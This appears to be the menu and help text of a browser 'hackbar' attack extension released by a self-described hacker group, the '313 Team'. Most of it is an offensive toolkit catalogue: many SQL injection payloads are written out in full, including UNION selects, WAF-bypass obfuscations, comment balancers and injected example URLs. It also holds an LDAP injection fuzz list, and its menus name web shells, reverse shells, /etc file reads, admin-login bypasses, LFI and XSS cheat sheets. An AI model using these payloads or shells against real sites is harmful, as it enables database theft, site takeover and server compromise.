WELCOME TO 313 HACKBAR

Made By Hacker Al-Imamah 313

SQL Basic

  • Convert Statement
    • Convert using UTF-8
    • CAST()
    • unhex(hex(version()))
    • uncompress(compress(version()))
    • binary(version())
    • aes_decrypt(aes_encrypt(version(),1),1)
    • reverse(tacnoc)
    • CONVERT USING ascii
    • substring(value,1,1)
      • substring(concat(value),1,1)=4
      • substring(concat(value),1,1)=5
      • substring(concat(value),1,1)=9
      • substring(concat(value),1,1)=10
    • CONVERT(concat(value),binary)
    • CHAR()
      • MySQL CHAR()
      • MsSQL CHAR()
      • Oracle CHAR()
    • Replace White String
      • +
      • /**/
      • Clear
    • System Variable
      • MySQL
        • VERSION
          • VERSION()
          • @@VERSION
          • @@GLOBAL.VERSION
          • @@VERSION_COMMENT
        • USER
          • USER()
          • CURRENT_USER()
          • SYSTEM_USER()
          • SESSION_USER()
          • SUBSTRING @
          • FROM PROCESSLIST
        • DATABASE
          • DATABASE()
          • SCHEMA()
          • FROM PROCESSLIST
        • Get Server Folders
          • CHARSETS FOLDER
          • ERROR LOG LOCATION
          • LANGUAGE DATADIR
          • PID FILE
          • PLUGIN DIR
          • SOCKET DIR
          • SQL BASEDIR
          • SQL DATADIR
          • TEMP DIR
        • CHARSET
          • CHARSET CLIENT
          • CHARSET CONNECTION
          • CHARSET DATABASE
          • CHARSET FILESYSTEM
          • CHARSET SERVER
        • CASE INSENSITIVE TABLES
        • CASE INSENSITIVE SYSTEM
        • COLLATION SET
        • HOSTNAME
        • INNODB
        • OPERATORS
        • PORT SQL
        • RECOVER OPTIONS
        • SERVER OS
        • SERVER OS TYPE
        • SSL OPEN
        • SYMLINK
        • TIMEOUT CONNECTION
        • TIMEOUT WAIT
    • Other
      • LPAD()
      • REPEAT()
      • IF statement
      • CASE WHEN THEN

UNION BASED

  • Column Count
    • ORDER BY
    • +ORDER+BY+
    • GROUP BY
    • +GROUP+BY+
    • PROCEDURE ANALYSE()
    • (SELECT * FROM *)=(SELECT 1)
  • Union Statement
    • Union Select 1,2,3,4,5
    • UNION+SELECT+1,2,3,4,5
    • UNION+All+SELECT+1,2,3,4,5
    • UNION+ALL+SELECT null,null,null
    • UNION(SELECT(1),(2),(3),(4),(5))
    • Union Distinctrow Select 1,2,3,4,5
    • Union Select 13371,13372,13373
    • Union Select 1%2c2%2c3%2c4%2c5
    • Union Select 1–+%0A,2–+%0A,3–+%0A
    • Union Select ~1,~2,~3,~4,~5
    • Union Select .1,.2,.3,.4,.5
    • Union Select '1','2','3','4','5'
    • Union Select 1111,2222,3333
      • Union Select 1111,2222,3333
      • UNION(SELECT(1111),(2222),(3333)
      • Union Select * from join(SELECT 1111)a...
    • Union Select CHAR(49),CHAR(50),CHAR(51)
    • join(SELECT 1)a join(SELECT 2)b join(SELECT 3)c
    • %23%0AUnion%23aaaaaaaaaaaaaaaaa%0ASelect%23%0A
  • Local Dios
    • LOCAL DIOS 1
    • LOCAL DIOS 2
    • LOCAL DIOS 3
    • LOCAL DIOS 4
    • LOCAL DIOS 5
    • LOCAL DIOS 6
    • LOCAL DIOS 7
    • LOCAL DIOS 8
    • LOCAL DIOS 9
    • LOCAL DIOS 10
    • LOCAL DIOS 11
  • Local Variable Dios
    • Local Dios
      • LOCAL DIOS 1
      • LOCAL DIOS 2
      • LOCAL DIOS 3
      • LOCAL DIOS 4
      • LOCAL DIOS 5
      • LOCAL DIOS 6
      • LOCAL DIOS 7
      • LOCAL DIOS 8
      • LOCAL DIOS 9
      • LOCAL DIOS 10
      • LOCAL DIOS 11
      • LOCAL DIOS 12
    • Password Dump
      • Data One Shot
      • Data Second Shot
      • Data Third Shot
  • Basic Statement
    • USER(),DATABASE(),VERSION()
    • Count() DATABASES
    • Privileges check
      • via I_S.PRIVILEGES
      • via MySQL SYSTEM TABLE
    • Get running query
  • Databases
    • DATABASE_NAMES group_concat()
    • DATABASE_NAMES one shot
    • DATABASE_NAME From Table Name
    • DATABASE_NAME From Table Name Waf
  • Tables
    • TABLE_NAMES
    • TABLE_NAMES one shot
    • TABLE Name Count
  • Columns
    • COLUMN_NAMES group_concat()
    • COLUMN_NAMES one shot
  • Data
    • DATA group_concat()
    • DATA one shot
    • DATA second shot
    • DATA third shot
  • join method
    • Join Method by FabiHaXor
  • Dios MySQL
    • DIOS SET 1
      • DIOS by Bla3l_D3vil
      • DIOS by AL!3N 6M3 (waf)
      • DIOS by Alien
      • DIOS by MCS waf
      • DIOS by Cobra waf
      • DIOS by Madblood
      • DIOS by M@dBl00d
      • DIOS by Mr.Silent coder
      • DIOS by T-Pro
      • DIOS by Dr.Z3r0
      • DIOS by Zen
      • DIOS by MakMan
      • DIOS by tr0jan WAF
      • DIOS by Madblood WAF
      • DIOS by Madblood WAF @x
      • DIOS by tr0jan Benchmark
      • DIOS by r0ot@h3x49
      • DIOS Using Replace
      • DIOS by MakMan WAF
      • DIOS by Ajkaro
      • DIOS by Zen WAF
    • DIOS SET 2
      • DIOS by Zen_1
      • DIOS WAF
      • DIOS by Rummy
      • DIOS by Shariq
      • DIOS by H3LL4R_H5H
      • DIOS by Harsha Haxor
      • DIOS by Dhani
      • DIOS by Rahul R@Z
      • DIOS by DHANI (WAF)
      • DIOS by Sec7or Team
      • DUMP Lokomedia
      • DIOS by R3yz3
      • DIOS by Profexer
      • DIOS 403 - T&C
      • DIOS 403 - U&P
      • DIOS by SKIDROW 1
      • DIOS by SKIDROW 2
      • DIOS by SKIDROW 3
      • DIOS by SKIDROW 4
      • DIOS by SKIDROW 5
    • DIOS SET 3
      • DIOS by SKIDROW 6
      • DIOS by SKIDROW 7
      • DIOS by SKIDROW 8
      • DIOS by SKIDROW 9
      • DIOS by SKIDROW 10
      • DIOS by SKIDROW 11
      • DIOS by SKIDROW 12
      • DIOS by Ahmed with xss
      • DIOS by Ahmed SQL + Xss
      • Dios by Ahmed without Hex
      • Error Based Dios After Parameter
      • Expo Method On Vul. Col
      • Logical variable Dios
      • DIOS By An0n 3xPloiTeR
      • DIOS By Exorcism 1
      • DIOS By Exorcism 2
      • DIOS Using DUMP_CARD NUMBER
      • DIOS Using MID SEPARATOR
      • DIOS Using Reverse
      • DIOS Using Benchmark
  • Dios PostgreSQL
    • FOR POSTGRE 8.4
    • FOR POSTGRE 9.1
    • ALL VERSIONS
  • Dios MsSQL
    • DIOS by Rummy / Zen MSSQL
  • Variable Methods
    • DB Names
    • DB Count
    • Primary DB Tables Count
    • Primary DB Columns Count
    • InfoSchema Tables Count
    • InfoSchema Columns Count

OUT FILE

  • File Privileges
  • Find Root Permission
  • Find Server Dir ( id[]=1 )
  • Load File
    • load_file('/etc/my.cnf')
    • load_file('/etc/group')
    • load_file('/etc/services')
    • load_file('/etc/hosts')
    • load_file('/etc/httpd/conf/httpd.conf')
  • INTO OUTFILE
  • VIEW SOURCE
  • Misc. Script
    • Block Shell Backdoor
  • PHP Shells
    • WSO shell
    • c99 Shell
    • b374k mini shell
    • mini shell
    • ssi shell
    • An0n 3xPloiTeR Shell
    • An0n 3xPloiTeR Mini
    • Wget System
      • WGET system (WSO Shells)
      • WGET exec (WSO Shells)
      • WGET shell_exec (WSO Shells)
      • WGET passthru (WSO Shells)
    • PHP SHELL by ALIEN
      • PHP SHELL
        • WSO SHELL TXT
        • INDOXPLOIT SHELL TXT
        • ALFA 3.0 SHELL TXT
        • R57 SHELL TXT
      • ASP SHELL
        • ASP WEB SHELL TXT
        • EL-YOFRO SHELL TXT
        • KACAK SHELL TXT
        • ASP CMD SHELL TXT
        • POUYA SHELL TXT
      • SHTML SHELL
        • SHTML SHELL TXT
  • PHP Script
    • PHP Reverse Shell (Bash)
    • PHP RFI
    • Node.js Reverse Shell
    • Uploader Script (0xHex)
    • Tiny Shell (0xHex By Rahul Raz)
    • Uploader (LFI)
    • 404 Uploader (LFI by Ph.Hitachi)
    • @fwrite/fopen with phpinfo()
    • fwrite/fopen (WSO shell)
    • fwrite/fopen (txt)
    • ${@fwrite/fopen}
    • CMD script (0xHex)
    • CMD php script (GET)
    • CMD php script (POST)
    • CMD base64 (GET)
    • CMD eval (REQUEST)
    • CMD eval (GET)
    • CMD eval (POST)
    • CMD eval (BASE64(GET))
    • CMD eval (BASE64(POST))
    • PHPINFO()
  • Writable Path
    • Linux
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /var/www/...
      • /etc/init.d/...
      • /etc/httpd/...
      • /etc/apache/...
      • /etc/apache/...
      • /etc/apache2/...
      • /etc/apache2/...
      • /usr/local/...
      • /usr/local/...
      • /opt/apache/...
      • /home/apache/...
      • /home/apache/...
      • /etc/apache2/...
      • /etc/apache2/...
      • /templates_compiled/
      • /templates_c/
      • /temporary/
      • /images/
      • /files/
      • /temp/
      • /etc/httpd/conf/httpd.conf
    • Windows
      • C:/XAMPP/...
      • C:/AppServ/...
      • C:/XAMPP/...
      • C:/AppServ/...
      • C:/wamp/...
      • C:/wamp/...
      • C:/Program Files/Ampps/...
      • C:/Program Files (x86)/Ampps/...

WAF BASED

  • Order by
    • /**/ORDER/**/BY/**/
    • /*!order*/+/*!by*/
    • /*!ORDER BY*/
    • /*!50000ORDER*//**//*!50000BY*/
    • /*!12345ORDER*/+/*!BY*/
    • /*!50000ORDER BY*/
    • /**/**/ORDER/**/BY/**/**/
    • order/**_**/by
  • Union Select
    • UNION TAB 1
      • /*!50000%55nIoN*/ /*!50000%53eLeCt*/
      • %55nion(%53elect 1,2,3)
      • +union+distinct+select+
      • +union+distinctROW+select+
      • + #?uNiOn + #?sEleCt
      • + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
      • /*!%55NiOn*/ /*!%53eLEct*/
      • +un/**/ion+se/**/lect
      • UNION/*&test=1*/SELECT/*&pwn=2*/
      • +?UnI?On?+'SeL?ECT?
      • +(UnIoN)+(SelECT)+
      • +(UnI)(oN)+(SeL)(EcT)
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • +uni>on+sel>ect+
      • %55nion(%53elect 1,2,3)-- -
      • /**//*!12345UNION SELECT*//**/
      • /**//*!50000UNION SELECT*//**/
      • /**/UNION/**//*!50000SELECT*//**/
      • /*!50000UniON SeLeCt*/
      • union /*!50000%53elect*/
    • UNION TAB 2
      • + #?uNiOn + #?sEleCt
      • + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
      • /*!%55NiOn*/ /*!%53eLEct*/
      • /*!u%6eion*/ /*!se%6cect*/
      • +un/**/ion+se/**/lect
      • uni%0bon+se%0blect
      • %2f**%2funion%2f**%2fselect
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
      • REVERSE(noinu)+REVERSE(tceles)
      • /*--*/union/*--*/select/*--*/
      • union (/*!/**/ SeleCT */ 1,2,3)
      • /*!union*/+/*!select*/
      • union+/*!select*/
      • /**/union/**/select/**/
      • /**/uNIon/**/sEleCt/**/
      • +%2F**/+Union/*!select*/
      • /**//*!union*//**//*!select*//**/
      • /*!uNIOn*/ /*!SelECt*/
      • uNiOn aLl sElEcT
      • UNIunionON+SELselectECT
    • UNION TAB 3
      • /**/union/*!50000select*//**/
      • 0%a0union%a0select%09
      • %0Aunion%0Aselect%0A
      • %55nion/**/%53elect
      • uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
      • %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
      • %0A%09UNION%0CSELECT%10NULL%
      • /*!union*//*--*//*!all*//*--*//*!select*/
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
      • /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • union+sel%0bect
      • +uni*on+sel*ect+
      • +#1q%0Aunion all#qa%0A#%0Aselect
      • union(select (1),(2),(3),(4),(5))
      • UNION(SELECT(column)FROM(table))
      • %23xyz%0AUnIOn%23xyz%0ASeLecT+
      • %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
      • union(select(1),2,3)
      • union (select 1111,2222,3333)
    • UNION TAB 4
      • uNioN (/*!/**/ SeleCT */ 11)
      • union (select 1111,2222,3333)
      • +#1q%0AuNiOn all#qa%0A#%0AsEleCt
      • /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
      • %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
      • +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
      • +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
      • /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
      • +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
      • /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
      • /union\sselect/g
      • /union\s+select/i
      • /*!UnIoN*/SeLeCT
      • +UnIoN/*&a=*/SeLeCT/*&a=*/
      • +uni>on+sel>ect+
      • +(UnIoN)+(SelECT)+
      • +(UnI)(oN)+(SeL)(EcT)
      • +?UnI?On?+'SeL?ECT?
      • +uni on+sel ect+
      • +/*!UnIoN*/+/*!SeLeCt*/+
    • UNION TAB 5
      • /*!u%6eion*/ /*!se%6cect*/
      • uni%20union%20/*!select*/%20
      • union%23aa%0Aselect
      • /**/union/*!50000select*/
      • /^****union.*$/ /^****select.*$/
      • /*union*/union/*select*/select+
      • /*uni X on*/union/*sel X ect*/
      • +un/**/ion+sel/**/ect+
      • +UnIOn%0d%0aSeleCt%0d%0a
      • UNION/*&test=1*/SELECT/*&pwn=2*/
      • un?+un/**/ion+se/**/lect+
      • +UNunionION+SEselectLECT+
      • +uni%0bon+se%0blect+
      • %252f%252a*/union%252f%252a /select%252f%252a*/
      • /%2A%2A/union/%2A%2A/select/%2A%2A/
      • %2f**%2funion%2f**%2fselect%2f**%2f
      • union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
      • /*!UnIoN*/SeLecT+
      • /*!50000UnION*//*!50000SeLeCt*/
      • ')AnD null UNiON SeLeCt 1,2,3,4,5;%00
      • ')AnD null UNiON SeLeCt 1,2,3,4,5+--+
      • ' And True Union Select 1,2,3;%00
      • ' And False Union Select 1,2,3;%00
      • ' And True Union Select 1,2,3+--+
      • ' And False Union Select 1,2,3+--+
  • Concat
    • CoNcAt()
    • CON%08CAT()
    • %0AcOnCat()
    • /**//*!12345cOnCat*/
    • /*!50000cOnCat*/(/*!*/)
    • unhex(hex(concat(table_name)))
    • unhex(hex(/*!12345concat*/(table_name)))
    • unhex(hex(/*!50000concat*/(table_name)))
  • Group Concat
    • /*!group_concat*/()
    • gRoUp_cOnCAt()
    • group_concat(/*!*/)
    • group_concat(/*!12345table_name*/)
    • group_concat(/*!50000table_name*/)
    • /*!group_concat*/(/*!12345table_name*/)
    • /*!group_concat*/(/*!50000table_name*/)
    • /*!12345group_concat*/(/*!12345table_name*/)
    • /*!50000group_concat*/(/*!50000table_name*/)
    • /*!GrOuP_ConCaT*/()
    • /*!12345GroUP_ConCat*/()
    • /*!50000gRouP_cOnCaT*/()
    • /*!50000Gr%6fuP_c%6fnCAT*/()
    • unhex(hex(group_concat(table_name)))
    • unhex(hex(/*!group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!12345group_concat*/(table_name)))
    • unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
    • unhex(hex(/*!50000group_concat*/(table_name)))
    • unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
    • unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
    • convert(group_concat(table_name)+using+ascii)
    • convert(group_concat(/*!table_name*/)+using+ascii)
    • convert(group_concat(/*!12345table_name*/)+using+ascii)
    • convert(group_concat(/*!50000table_name*/)+using+ascii)
    • CONVERT(group_concat(table_name)+USING+latin1)
    • CONVERT(group_concat(table_name)+USING+latin2)
    • CONVERT(group_concat(table_name)+USING+latin3)
    • CONVERT(group_concat(table_name)+USING+latin4)
    • CONVERT(group_concat(table_name)+USING+latin5)
  • Polygon
    • +div+0
    • div false
    • Having 1=0
    • having false
    • and false
    • and null
    • AND 1=0
    • and(1)=(0)
    • and (1)!=(0)
    • and 2>3
    • %26%26 null
    • and point(29,9)
    • and mod(9,4)
    • and power(5,5)
    • and Radians(point(53,12))
    • and polygon(point(53,12))
    • Multipolygon(point(53,12))
    • Linestring(point(53,12))
    • Multilinestring(point(53,12))
    • Geometrycollection(point(53,12))
  • Schema
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
    • /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
    • /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
    • /*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
  • Calculation
    • or 1=1
    • or 0=0
    • or 25-10-5=5
    • or 20-5-5=10
    • or 25-5-5=15
    • or 5*5*1=25
    • or 5*5+5=30
    • Or 1 Less Than 0
  • Balancer
    • FIX TAB 1
      • Integer Based
        • --
        • -- -
        • --+-
        • )--
        • )-- -
        • )--+-
        • ))--
        • ))-- -
        • ))--+-
        • ;%00
        • ) ;%00
        • ));%00
        • %23
        • %60
        • %90
        • and 1=1
        • and '1'='1
        • and (1)=(1
        • php?id=(1) -- -
      • String Based
        • '--+-
        • ')-- -
        • ')--+-
        • '))-- -
        • '))--+-
        • ';%00
        • ');%00
        • '));%00
        • '%23
        • '%60
        • '%90
        • ' and 1=1
        • ' and '1'='1
        • ' and (1)=(1
        • php?id=(1') -- -
      • String Based Double Quotes
        • "-- -
        • "--+-
        • "%23
        • ")-- -
        • ")--+-
        • "))--+-
        • ";%00
        • ") ;%00
        • "));%00
        • "%60
        • "%90
        • " and 1=1
        • " and '1'='1
        • " and (1)=(1
        • php?id=(1") -- -
    • FIX TAB 2
      • /*
      • --/*
      • \\--+
      • \\-- +
      • #--+
      • #-- -
      • --++
      • +--+
      • '))%23
      • a'))%60
      • '));%00
      • ');%00
      • ')order by 10;%00
    • FIX TAB 3
      • AND'1
      • or'1
      • AND1='1
      • and 1=0
      • ') and true
      • ') and false
      • ') or true
      • ') or false
      • ' and true
      • ' and false
      • ' or true
      • ' or false
      • and x(point(0,0)) -- -

CUSTOM

  • CUSTOM DIOS (10 Slots)
  • CUSTOM XSS (10 Slots)
  • CUSTOM QUERY (10 Slots)

ERROR/DOUBLE QUERY

  • Error Based
  • XPATH EXTRACTVALUE
  • XPATH UPDATEXML
  • POLYGON / MULTIPOINT
  • MULTIPOINT DIOS
  • Advance Error based (MySQL >=5.5)
  • Dios by MadBlood (MySQL >=5.5)
  • Double Query Based
  • MSSQL ERRORBASED

TOOLS

  • Admin Bypass Queries
  • ADMIN PANEL LINK
  • 2K SQLI DORKS
  • Find injection type

WAF BYPASS

  • WAF SET 1
    • /*!_STRING_*/
    • /^.*_STRING_.*$/
    • /*!51000_STRING_*/
    • /*!50000_STRING_*/
    • /*!12345_STRING_*/
    • /*!13337_STRING_*/
    • /*!00000_STRING_*/
    • /*!56000_STRING_*/
    • /*!50095_STRING_*/
    • /*!40122_STRING_*/
    • /*!OverFlow_STRING_*/
    • cutoffCUTOFFWAFwaf
  • WAF SET 2
    • /**/_STRING_/**/
    • +--+_STRING_+--+
    • /*--*/_STRING_/*--*/
    • _STRING_/*&a=*/()
    • _STRING_/*1337*/()
    • _STRING_/**x**/()
    • _STRING_/**_**/()
    • _STRING_/**aaa**/()
  • WAF SET 3
    • %0A_STRING_%0A
    • %0b_STRING_%0b
    • %0d%0A_STRING_%0d%0A
    • %23%0A_STRING_%23%0A
    • %23aa%0A_STRING_%23aa%0A
    • %23xyz%0A_STRING_%23xyz%0A
    • %23foo%0D%0A_STRING_%23foo%0D%0A
    • %23foo*%2F*bar%0D%0A_STRING_%23foo*%2F*bar%0D%0A
    • #qa%0A#%0A_STRING_#qa%0A#%0A
    • /*!20000%0d%0a_STRING_*/
    • /*!blobblobblob%0d%0a_STRING_*/
    • /*!f****U%0d%0a_STRING_*/
  • WAF SETS

LDAP FUZZ

  • *
  • *)(&
  • *))%26'
  • *()|&'
  • *(|(mail=*))
  • (|(objectclass=*))
  • *)(uid=*))(|(uid=*
  • */*
  • *|
  • //*
  • @*
  • admin*
  • admin*)((|userpassword=*)
  • x' or name()='username' or 'x'='y
  • %2A%28%7C%28mail%3D%2A%29%29
  • *(|(objectclass=*))
  • %2A%28%7C%28objectclass%3D%2A%29%29
  • %2A%7C
  • %7C

ENCODING

  • BASE64 ENCODE
  • BASE DECODE
  • URL ENCODE
  • URL DECODE
  • HEX ENCODING
  • HEX DECODING

0xHTML

  • <br>
  • <br><br>
  • \n
  • Separator <br>
  • <li>
  • <b>
  • </b>
  • <font face=courier>
  • <font color=red>
  • <font color=blue>
  • <font color=green>
  • <font color=purple>
  • <font color=magenta>
  • <font color=custom>
  • </font>
  • <img src=https://yourimagelink.com/image.jpg>
  • <div>
  • </div>
  • <marquee>
  • </marquee>
  • </title>
  • </img>
  • </a>
  • </p>
  • ">
  • '>
  • />
  • "/>
  • -->

ENCRYPTION

  • MD5 Hash
  • SHA-1 Hash
  • SHA-256 Hash
  • Rot13

XSS

  • XSS cheat Sheet 1
  • XSS cheat Sheet 2
  • XSS cheat Sheet 3
  • String.fromCharCode()
  • HTML Character
  • Alert(XSS)

LFI

  • LFI cheat Sheet 1
  • LFI cheat Sheet 2
  • LFI Filter
  • LFI Wrapper
  • LFI Wrapper (Base64)
  • RFI Wrapper Expect
  • XSS via LFI payload

Tools

Restore Defaults

This restores the default style.

Export Preferences ( txt )

1. Change the value of color, font, icon, etc.
2. Go to Settings.
3. Select Export preferences.
4. Save the preferences.

Import Preferences ( txt )

1. Go to Settings.
2. Select Import preferences.
3. Select the exported txt preferences.
4. Restart your browser.

Export Preferences ( Theme )

1. Change the value of color, font, icon, etc.
2. Go to Settings.
3. Select Export preferences.
4. Save the preferences.

Import Preferences ( Theme )

1. Go to Settings.
2. Select Import preferences.
3. Select the exported json preferences.
4. Restart your browser.

Watch the video to learn how to import preferences.

About 313 Team

313 Team, or the Islamic Cyber Resistance in Iraq (CIRI), is the arm responsible for managing the cyber training wing (Liwa Badr) and the software development wing (Liwa Awli Aleazm) of the Islamic Cyber Resistance Axis. It is a team composed of professional Iraqi hackers and programmers. The Islamic Cyber Resistance in Iraq - 313 Team was founded on June 13, 2023. Hacker Al-Imamah313 - CEO.

WAF BYPASS

WAF bypass by replacing spaces and parentheses.

Ex: ORDER/**/BY or USER/**/()

Query                              Space   Parenthesis
/**/                               Yes     Yes
+--+                               Yes     No
/*--*/                             Yes     Yes
/*&a=*/                            Yes     Yes
/*1337*/                           Yes     Yes
/**x**/                            Yes     Yes
/**_**/                            Yes     Yes
/**aaa**/                          Yes     Yes
/*!_STRING_*/                      Yes     No
/^.*_STRING_.*$/                   Yes     No
/*!51000_STRING_*/                 Yes     No
/*!50000_STRING_*/                 Yes     No
/*!12345_STRING_*/                 Yes     No
/*!13337_STRING_*/                 Yes     No
/*!00000_STRING_*/                 Yes     No
/*!56000_STRING_*/                 Yes     No
/*!50095_STRING_*/                 Yes     No
/*!40122_STRING_*/                 Yes     No
%0A                                Yes     Yes
%0b                                Yes     Yes
%0d%0A                             Yes     Yes
%23%0A                             Yes     Yes
%23aa%0A                           Yes     Yes
%23xyz%0A                          Yes     Yes
%23foo%0D%0A                       Yes     Yes
%23foo*%2F*bar%0D%0A               Yes     Yes
#qa%0A#%0A                         Yes     Yes
/*!20000%0d%0a_STRING_*/           Yes     No
/*!blobblobblob%0d%0a_STRING_*/    Yes     No
/*!f****U%0d%0a_STRING_*/          Yes     No

Base64 spacer

Base64 Spacer automatically decodes base64 and appends [BASE64=DecodedString].

Base64 Spacer is used for SQLi on base64-encoded parameters without manually encoding and decoding.

Example

https://site.com/index.php?id=MTI=

0xHEX

0xHEX is used to print a string or text on the target website.

Example

localhost/index.php?id=12' Union Select 1,2,3,concat(injected by ph.hitachi),5,6,7,8,9,10-- -

%URL

%URL encode and decode is used for WAF bypassing and more.

Example

localhost/index.php?id=12' Union Select 1,2,3,4,5,6,7,8,9,10-- -

BASE64

BASE64 encode and decode is used for SQLi on base64-encoded parameters (encode & decode).

Example

http://localhost/index.php?id=MTInIFVuaW9uIFNlbGVjdCAxLDIsMyxjb25jYXQoJ2luamVjdGVkIGJ5IHBoLmhpdGFjaGknKSw1LDYsNyw4LDksMTAtLSAt

0bBINARY

0bBINARY encode and decode is an alternative way of printing a string or text, like the 0xHEX function.

Example

http://localhost/index.php?id=12' Union Select 1,2,3,concat(0b01110000011010000010111001101000011010010111010001100001011000110110100001101001),5,6,7,8,9,10-- -

Customize your hackbar

The "Customize your hackbar" features were added by Ph.Hitachi for the best experience when using hackbar tools for penetration testing. In this hackbar you can edit or modify basic styles such as color, font, font-style, font-size, border, border-size, border-radius and opacity, and also upload a custom icon or choose an icon.

Color names, hex codes, rgb(a) and hsl(a) values are supported for colors; images (*.jpg, *.png, *.gif) are supported for icons.

Hackbar Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Postdata Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Referrer Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Replace Field

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Menupopup

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Opacity
  • Font-Family
  • Font-Style (bold & italic)

Main Button (load, split, execute)

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Toolbar button (hackbar layout)

  • Text-Color
  • Background-Color
  • Border-Top
  • Border-left
  • Border-Bottom
  • Border-Right
  • Border-Size
  • Border-Radius
  • Font-Size
  • Font-Family
  • Font-Style (bold & italic)

Custom Arrow Icon

For the custom arrow icon you can choose an icon, upload one, or link to an online image by URL.

  • 0xHEX (ENCODE)
  • 0xHEX (DECODE)
  • %URL (ENCODE)
  • %URL (DECODE)
  • BASE64 (ENCODE)
  • BASE64 (DECODE)
  • 0bBINARY (ENCODE)
  • 0bBINARY (DECODE)
  • REPLACE
  • BASE64 SPACER
  • Upload Custom Icon
  • Choose icon

Custom Queries

  • Dios (10 slots)
  • XSS (10 slots)
  • Others (10 slots)

Advanced (Hide & Remove Style)

You can hide toolbars that overflow or do not fit your resolution, and also remove styles.
Note: if you remove a style, it cannot be restored to the previous style.

  • SQLI BASIC
  • UNION BASED
  • OUT FILE
  • WAF BYPASSED
  • CUSTOM
  • ERROR/DOUBLE QUERIES
  • TOOLS
  • WAF BYPASS
  • LDAP FUZZ
  • ENCODING
  • 0xHTML
  • ENCRYPTION
  • OTHERS
  • XSS
  • LFI
  • LINKS
  • Replace Field